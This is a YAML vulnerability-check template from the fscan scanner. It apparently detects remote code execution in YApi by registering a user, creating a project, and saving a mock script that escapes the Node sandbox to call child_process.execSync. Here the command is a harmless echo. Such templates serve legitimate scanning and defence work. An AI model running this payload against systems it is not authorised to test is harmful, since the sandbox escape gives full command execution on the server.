fscan/webscan/pocs/yapi-rce.yml
ZacharyZcR c2b63a57e2 refactor: 修正包命名规范并修复编译问题
- 重命名 Common -> common,WebScan -> webscan,遵循 Go 包命名约定
- 修复模块路径大小写不匹配导致的编译错误
- 清理依赖项,优化 go.mod 文件
- 添加 Docker 测试环境配置文件
- 新增镜像拉取脚本以处理网络超时问题
- 成功编译生成 fscan v2.2.1 可执行文件

该修复解决了 Linux 系统下包名大小写敏感导致的模块解析失败问题。
2025-09-01 22:41:54 +00:00

85 lines
3.2 KiB
YAML

name: poc-yaml-yapi-rce
set:
redemail: randomLowercase(15)
redpassword: randomLowercase(15)
redproject: randomLowercase(8)
redinterface: randomLowercase(10)
r1: randomLowercase(10)
r2: randomLowercase(10)
r3: randomLowercase(10)
r4: randomLowercase(10)
rules:
- method: POST
path: /api/user/reg
headers:
Content-Type: application/json;charset=UTF-8
follow_redirects: true
body: |
{"email":"{{redemail}}@qq.com","password":"{{redpassword}}","username":"{{redemail}}"}
expression: |
response.status == 200 && response.headers["Set-Cookie"].contains("_yapi_token=") && response.headers["Set-Cookie"].contains("_yapi_uid=") && response.body.bcontains(bytes(redemail))
- method: GET
path: /api/group/list
search: |
"_id":(?P<group_id>.+?),
expression: |
response.status == 200 && response.content_type.icontains("application/json") && response.body.bcontains(bytes("custom_field1"))
- method: POST
path: /api/project/add
headers:
Content-Type: application/json;charset=UTF-8
body: |
{"name":"{{redproject}}","basepath":"","group_id":"{{group_id}}","icon":"code-o","color":"cyan","project_type":"private"}
search: |
tag":\[\],"_id":(?P<project_id>.+?),
expression: |
response.status == 200 && response.body.bcontains(bytes("成功!")) && response.body.bcontains(bytes(redproject))
- method: GET
path: /api/project/get?id={{project_id}}
search: |
"_id":(?P<catid>.+?),
expression: |
response.status == 200 && response.body.bcontains(bytes("成功!"))
- method: POST
path: /api/interface/add
headers:
Content-Type: application/json;charset=UTF-8
body: |
{"method":"GET","catid":"{{catid}}","title":"{{redinterface}}","path":"/{{redinterface}}","project_id":{{project_id}}}
search: |
"_id":(?P<interface_id>.+?),
expression: |
response.status == 200 && response.body.bcontains(bytes("成功!")) && response.body.bcontains(bytes(redinterface))
- method: POST
path: /api/plugin/advmock/save
headers:
Content-Type: application/json;charset=UTF-8
body: |
{"project_id":"{{project_id}}","interface_id":"{{interface_id}}","mock_script":"const sandbox = this\r\nconst ObjectConstructor = this.constructor\r\nconst FunctionConstructor = ObjectConstructor.constructor\r\nconst myfun = FunctionConstructor('return process')\r\nconst process = myfun()\r\nmockJson = process.mainModule.require(\"child_process\").execSync(\"echo {{r1}}${{{r2}}}{{r3}}^{{r4}}\").toString()","enable":true}
expression: |
response.status == 200 && response.body.bcontains(bytes("成功!"))
- method: GET
path: /mock/{{project_id}}/{{redinterface}}
expression: |
response.status == 200 && (response.body.bcontains(bytes(r1 + r3 + "^" + r4)) || response.body.bcontains(bytes(r1 + "${" + r2 + "}" + r3 + r4)))
- method: POST
path: /api/project/del
headers:
Content-Type: application/json;charset=UTF-8
body: |
{"id":{{project_id}}}
expression: |
response.status == 200
detail:
author: tangshoupu
info: yapi-rce
links:
- https://github.com/YMFE/yapi/issues/2229